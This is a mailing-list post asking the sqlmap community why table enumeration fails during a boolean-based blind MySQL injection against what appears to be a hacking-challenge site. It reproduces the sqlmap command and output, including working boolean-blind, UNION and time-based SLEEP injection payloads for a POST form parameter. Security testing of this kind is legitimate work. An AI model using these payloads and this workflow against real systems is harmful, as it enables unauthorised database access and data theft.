Hi,
is there anybody help me about a mysql boolean based sql injection
exploitation with sqlmap..I found database names with sqlmap but I didnt
find any tables from any database..I dont want to use for finding table
names from a common table names file.. So, how can I take full table names
with sqlmap or another tool..I tried havij but I can not find any table
name with it ..is there any idea ?
I had this error on sqlmap :
*./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D mysql
--tables*
*
*
* sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover
tool*
* http://www.sqlmap.org*
*
*
*[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Authors assume no liability and
are not responsible for any misuse or damage caused by this program*
*
*
*[*] starting at 15:01:42*
*
*
*[15:01:42] [INFO] testing connection to the target url*
*[15:01:43] [INFO] searching for forms*
*[15:01:43] [INFO] sqlmap got a total of 2 targets*
*[#1] form:*
*POST http://level4.hack2net.com:80/projects.php?form=ara*
*POST data: kelime=&tur=1&aramayap=Ara*
*do you want to test this form? [Y/n/q] *
*> y*
*Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
fields detected): *
*do you want to fill blank fields with random values? [Y/n] y*
*[15:01:50] [INFO] using '/pentest/database/sqlmap/output/
level4.hack2net.com/session' as session file*
*[15:01:50] [INFO] resuming injection data from session file*
*[15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file*
*[15:01:50] [INFO] using
'/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results
file*
*sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:*
*---*
*Place: POST*
*Parameter: kelime*
* Type: boolean-based blind*
* Title: AND boolean-based blind - WHERE or HAVING clause*
* Payload: kelime=38' OR '38'='38' AND 5116=5116 AND
'Hbnf'='Hbnf&tur=4&aramayap=Ara*
*
*
* Type: UNION query*
* Title: MySQL UNION query (NULL) - 5 columns*
* Payload: kelime=38' OR '38'='38' UNION ALL SELECT
CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL,
NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara*
*
*
* Type: AND/OR time-based blind*
* Title: MySQL > 5.0.11 AND time-based blind*
* Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND
'mlpI'='mlpI&tur=4&aramayap=Ara*
*---*
*
*
*do you want to exploit this SQL injection? [Y/n] y*
*[15:01:56] [INFO] the back-end DBMS is MySQL*
*
*
*web application technology: PHP 5.3.5*
*back-end DBMS: MySQL 5.0.11*
*[15:01:56] [INFO] fetching tables for database: mysql*
*[15:01:56] [INFO] fetching number of tables for database 'mysql'*
*[15:01:56] [WARNING] running in a single-thread mode. Please consider
usage of option '--threads' for faster data retrieval*
*[15:01:56] [INFO] retrieved: *
*[15:01:58] [WARNING] unable to retrieve the number of tables for database
'mysql'*
*[15:01:58] [ERROR] unable to retrieve the table names for any database*
*do you want to use common table existence check? [Y/n/q] *
Thanks a lot..
--
*Fırat Celal Erdik
Security Specialist, Certified Ethical Hacker - C|EH**
http://www.networkpentest.net*
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
